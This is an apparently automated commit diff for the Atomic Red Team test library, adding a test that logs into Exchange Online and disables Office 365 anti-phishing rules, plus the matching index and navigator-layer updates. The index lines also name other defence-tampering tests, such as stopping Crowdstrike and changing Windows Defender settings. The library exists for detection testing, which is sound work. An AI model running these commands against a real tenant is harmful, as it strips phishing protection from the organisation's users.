Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json

@@ -1 +1 @@
-{"version":"4.2","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
+{"version":"4.2","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]}

atomics/Indexes/Indexes-CSV/index.csv

@@ -343,6 +343,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,21,Uninstall Crowdstrike Falco
 defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,25,office-365-Disable-AntiPhishRule,b9bbae2c-2ba6-4cf3-b452-8e8f908696f3,powershell
 defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
 defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -97,6 +97,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601
 defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
 defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
 defense-evasion,T1562.001,Disable or Modify Tools,4,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
+defense-evasion,T1562.001,Disable or Modify Tools,25,office-365-Disable-AntiPhishRule,b9bbae2c-2ba6-4cf3-b452-8e8f908696f3,powershell
 defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
 defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh

atomics/Indexes/Indexes-Markdown/index.md

@@ -573,6 +573,7 @@
   - Atomic Test #22: Tamper with Windows Defender Evade Scanning -Folder [windows]
   - Atomic Test #23: Tamper with Windows Defender Evade Scanning -Extension [windows]
   - Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
+  - Atomic Test #25: office-365-Disable-AntiPhishRule [office-365]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -220,6 +220,7 @@
   - Atomic Test #2: Disable Cb Response [linux]
   - Atomic Test #3: Disable SELinux [linux]
   - Atomic Test #4: Stop Crowdstrike Falcon on Linux [linux]
+  - Atomic Test #25: office-365-Disable-AntiPhishRule [office-365]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

atomics/Indexes/index.yaml

@@ -24532,6 +24532,52 @@ defense-evasion:
           Remove-MpPreference -ExclusionProcess  $excludedProcess
         name: powershell
         elevation_required: true
+    - name: office-365-Disable-AntiPhishRule
+      auto_generated_guid: b9bbae2c-2ba6-4cf3-b452-8e8f908696f3
+      description: 'Using the Disable-AntiPhishRule cmdlet to disable antiphish rules
+        in your office-365 organization.
+
+'
+      supported_platforms:
+      - office-365
+      input_arguments:
+        username:
+          description: office-365 username
+          type: String
+          default: 
+        password:
+          description: office-365 password
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'ExchangeOnlineManagement PowerShell module must be installed
+
+'
+        prereq_command: |
+          $RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
+        get_prereq_command: |
+          Install-Module -Name ExchangeOnlineManagement
+          Import-Module ExchangeOnlineManagement
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-ExchangeOnline -Credential $creds
+          $test = Get-AntiPhishRule
+          Disable-AntiPhishRule -Identity $test.Name -Confirm:$false
+          Get-AntiPhishRule
+        cleanup_command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-ExchangeOnline -Credential $creds
+          $test = Get-AntiPhishRule
+          Enable-AntiPhishRule -Identity $test.Name -Confirm:$false
+          Get-AntiPhishRule
+        name: powershell
+        elevation_required: false
   T1078.002:
     technique:
       external_references:

atomics/T1562.001/T1562.001.md

@@ -52,6 +52,8 @@
 
 - [Atomic Test #24 - Tamper with Windows Defender Evade Scanning -Process](#atomic-test-24---tamper-with-windows-defender-evade-scanning--process)
 
+- [Atomic Test #25 - office-365-Disable-AntiPhishRule](#atomic-test-25---office-365-disable-antiphishrule)
+
 
 <br/>
 
@@ -996,4 +998,67 @@ Remove-MpPreference -ExclusionProcess  $excludedProcess
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #25 - office-365-Disable-AntiPhishRule
+Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization.
+
+**Supported Platforms:** Office-365
+
+
+**auto_generated_guid:** b9bbae2c-2ba6-4cf3-b452-8e8f908696f3
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | office-365 username | String | |
+| password | office-365 password | String | |
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+Connect-ExchangeOnline -Credential $creds
+$test = Get-AntiPhishRule
+Disable-AntiPhishRule -Identity $test.Name -Confirm:$false
+Get-AntiPhishRule
+```
+
+#### Cleanup Commands:
+```powershell
+$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+Connect-ExchangeOnline -Credential $creds
+$test = Get-AntiPhishRule
+Enable-AntiPhishRule -Identity $test.Name -Confirm:$false
+Get-AntiPhishRule
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: ExchangeOnlineManagement PowerShell module must be installed
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name ExchangeOnlineManagement
+Import-Module ExchangeOnlineManagement
+```
+
+
+
+
 <br/>